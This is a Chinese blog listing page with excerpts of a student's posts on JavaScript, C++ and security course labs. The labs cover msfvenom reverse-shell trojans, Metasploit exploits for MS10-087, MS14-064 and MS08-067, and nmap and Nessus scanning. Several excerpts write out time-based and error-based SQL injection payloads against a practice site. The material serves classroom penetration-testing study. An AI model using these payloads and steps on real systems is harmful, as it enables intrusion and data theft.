- 博客(24)
- 收藏
- 关注
RSS订阅原创 HTML--javascript(5)HTML DOM事件
是一个JavaScript事件属性,用于在用户改变元素的值后触发指定的JavaScript代码。鼠标点击的所有事件:onmousedown, onmouseup 以及 onclick。onmouseover 可用于在用户的鼠标移至 HTML 元素上方元素时触发函数。用于在指定的元素加载完成后,执行一段JavaScript代码。onmouseout 可用于在用户的鼠标移出至 HTML 元素时触发函数。3)最后,当完成鼠标点击时,会触发 onclick 事件。,以便在用户输入或选择不同的值时执行某些操作。
2024-12-29 20:43:17
426
原创 HTML--javascript(4)基本语法
2)变量分配数值时,不要使用引号。如果您用引号包围数值,该值会被作为文本来处理。1)变量分配文本值时,应该用双引号或单引号包围这个值。多行注释: /* */变量声明之后,该变量是。
2024-12-28 22:23:41
158
原创 HTML--javascript(3)js的输出方式
免责声明该篇文章为个人学习菜鸟教程的笔记,推荐大家跟这网站敲一遍。JavaScript 没有任何打印或者输出的函数。
2024-12-28 21:45:30
234
原创 HTML--javascript(1)
javascript ————可以在网页中添加交互功能、动态内容。通过触发按钮,改变某处文本;通过触发图片改变自身图片。
2024-12-28 19:23:43
1258
原创 c++基础
include<iostream> //iostream头文件包含 封装了cont cin等输入输出操作符。//读取一行的字符串。//可多个箭头连续输出多个值;//c++里面是不需要加上struct前缀。str=“字符串”/std::string a="字符串";//空间名一般是std。str+="字符串";方法1:std::a。b相当于a的别名,对b的操作会影响到a。endl //换行。ends //空格。
2024-12-26 10:17:10
327
原创 随堂练习5
运用msfvenom制作攻击脚本,将payload设置为Windows/meterpreter/reverse_tcp,lport设置为5000+你的学号的后两位(如你的学号为01,则端口号设置为5001),输出文件格式为exe,输出文件放置为桌面上。将制作攻击脚本的指令截图。在kali端开启侦听服务,等待客户端点击前面生成的木马程序后自动连接过来,将开启侦听服务的过程截图(包括参数的设置及侦听状态)将木马攻击的结果截图,即得到的meterpreter会话,用getuid查看你登陆目标机的用户名。
2024-12-18 20:25:06
362
原创 随堂练习4
在kali中利用ms10-087漏洞对Win7(必须包含office)进行渗透测试,将关键的实验步骤截图(包括payload的设置、参数的设置、实验结果等)。要求:将rtf文件名设置为你的名字的全拼;设置payload为:payload/windows/shell/reverse_tcp。简述ms10-087漏洞利用的原理及该漏洞适用的范围,漏洞适用范围可截图显示。11-19 10:48 已提交,待教师公布正确答案 修改。
2024-12-18 20:24:27
187
原创 随堂练习3
在kali中利用ms14-064漏洞对WIN7进行渗透测试,将关键的实验步骤截图(包括payload的设置、参数的设置、实验结果等),要求将URIPATH设置为你的学号。11-19 10:46 已提交,待教师公布正确答案 修改。写出你实验过程中遇到的问题及解决的办法(如有)
2024-12-18 20:23:55
206
原创 随堂练习2
我的答案:MS8-067漏洞利用原理 MS8-067漏洞,全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,主要影响Windows系统的SMB服务。在Wireshark中,可以查看到SMB数据包的具体内容,包括请求的路径、发送的数据大小等信息,从而分析攻击的具体细节。开启虚拟机Kali和Server2003,将Kali和Server2003放置在同一个网段中,将Kali 的IP设置为192.168.学号.3,将Server2003的IP设置为192.168.学号.12。
2024-12-18 20:23:19
865
原创 随堂练习1
我的答案:针对MS12-020漏洞的防范措施,以下是一些可行的方法: 及时更新操作系统和应用程序:保持系统和应用程序的最新版本是防止漏洞利用的关键。禁用不必要的服务:禁用不需要的SMB服务和其他不必要的网络服务可以减少被攻击的风险。使用安全工具:部署入侵检测和预防系统(IDS/IPS)等安全工具可以帮助检测和防御针对SMB协议的攻击。这有助于减少潜在的损害范围并提高恢复能力。Windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化的或已经删除的对象,导致任意代码执行,使目标机出现蓝屏。
2024-12-18 20:22:28
429
原创 第05讲第02个实验
id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),null) --asd 判断表名?id=1' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))=105,sleep(5),1)--+ 判断字段内容:?
2024-12-18 20:21:46
908
原创 第05讲第01个实验
id=0" and updatexml(1,concat('$',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) -- asd 查字段内容,应该还是限长,用limit:?
2024-12-18 20:21:03
626
原创 第05讲第00个实验
在kali机的火狐浏览器中,用目标机的ip地址访问SQL注入练习网站,打开Less-1的页面,并将页面截图上传,要求截图时必须清晰包含火狐浏览器的访问网址,且要与kali机的ifconfig同屏截图,在图片右下角标上学号后两位。第六步,在Less-1中,写出爆库的语句,即读取出当前数据库的emails表中的所有数据,并将结果截图,要求与攻击机的ifconfig同屏截图,在图片右下角标上学号后两位。2. 必答 [简答题]3. 必答 [简答题]4. 必答 [简答题]5. 必答 [简答题]6. 必答 [简答题]
2024-12-18 20:20:12
561
原创 第03讲第02个实验
在Client上用Nessus中的Credentialed Patch Audit,指定Target为Server2,ScanName定义为姓名+06,进行扫描,并将扫描结果中的严重漏洞、高危漏洞和中等漏洞的信息截屏,要求与Client的ifconfig同屏截图。在Client上用Nessus中的Host Discovery,指定Target为Server1,并设置扫描获得所有端口号,ScanName定义为姓名+02,然后进行扫描,并将扫描结果截屏,要求与Client的ifconfig同屏截图。
2024-12-18 20:19:08
877
原创 第03讲第01个实验
查阅文献,在Client上安装httrack,对Server2中在8012端口开放的Web网站中的公司新闻版块做网站镜像,其中链接深度设为3层,将镜像结果放在以学号命名的文件夹中,完成镜像后将文件夹的结果截屏上传,并在浏览器中打开其中的index.htm,连同地址截屏,要求与Client的ifconfig同屏截图。请将内网2中的Client机与内网1中的Server2机互相连通的结果(ping)截屏上传,要求与Client机的ipconfig同屏截图,并在图片上标识出你学号的最后两位。
2024-12-18 20:18:29
1649
原创 第02讲第02个实验
445/tcp - open - microsoft-ds - Windows Windows Server 2003 3790 Service Pack 2 microsoft-ds: 服务:Microsoft Directory Services 版本:Windows Server 2003 SP2,这是一个较老的Windows服务器操作系统版本。在Kali端使用nmap工具对server进行端口扫描,停止server上的www服务,然后再此对server进行端口扫描,比较两次扫描的结果。
2024-12-18 20:17:50
905
原创 第02讲第01个实验
在Kali端使用dnsenum工具对sohu.com进行DNS信息收集的结果截图,要求使用百度的域名服务器(180.76.76.76或114.114.114.114)进行解析,并将结果与ifconfig同屏截图。在Server端安装DNS服务,创建主要区域(姓名.edu.cn)的正、反向查找区域,并分别创建主机dns.姓名.edu.cn、www.姓名.edu.cn和abc123.姓名.edu.cn,IP地址都设置为当前的Server的IP地址。5. 必答 [简答题]6. 必答 [简答题]
2024-12-18 20:16:04
260
原创 第01讲第03个实验
② 在Server上安装DNS服务,创建主要区域(姓名.edu.cn)的正、反向查找区域,并分别创建主机dns.姓名.edu.cn、www.姓名.edu.cn和ftp.姓名.edu.cn,IP地址都设置为当前的Server的IP地址。注:这里的姓名为你本人的姓名全拼。④ 在Sever上安装并启动FTP服务,并且创建两个隔离用户,姓名1和姓名2,这里的姓名用本人姓名的首字母即可,分别为这两个用户创建各自的ftp文件夹,并在各自的文件夹中分别放入以中文姓名和学号命名的.txt文档。
2024-12-18 20:15:02
1711
原创 第01讲第02个实验
请将路由器的远程访问设置结果截屏,要求显示出专网1与专网2的网段,同时将路由器的IP地址设置结果(ipconfig)与此同屏截图,并在图片上标识出你学号的最后两位。请将专网1中的虚拟机连通专网2的虚拟机的结果(ping)截屏,要求将专网1的ip地址(ipconfig)同屏显示,并在图片上标识出你学号的最后两位。请将专网2中的虚拟机连通专网1的虚拟机的结果(ping)截屏,要求将专网2的ifconfig同屏显示,并在图片上标识出你学号的最后两位。3. 必答 [简答题]4. 必答 [简答题]
2024-12-18 20:13:12
278
原创 第一个实验
请将内网虚拟机连通外网网关(192.168.100.2)的结果(ping)截屏,并将内网中的IP地址设置结果(ipconfig)同屏截图,并在图片上标识出你学号的最后两位。请将路由器的远程访问设置结果截屏,要求显示出内网与外网的网段,同时将路由器的IP地址设置结果(ipconfig)与此同屏截图,并在图片上标识出你学号的最后两位。② 内网设置为VMnet2,网段为192.168.学号.0,这里的学号指的是学号的最后两位,以下相同。我的答案:连不上网,没练校园网,dns是校园网的。4. 必答 [简答题]
2024-12-18 20:12:28
396
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人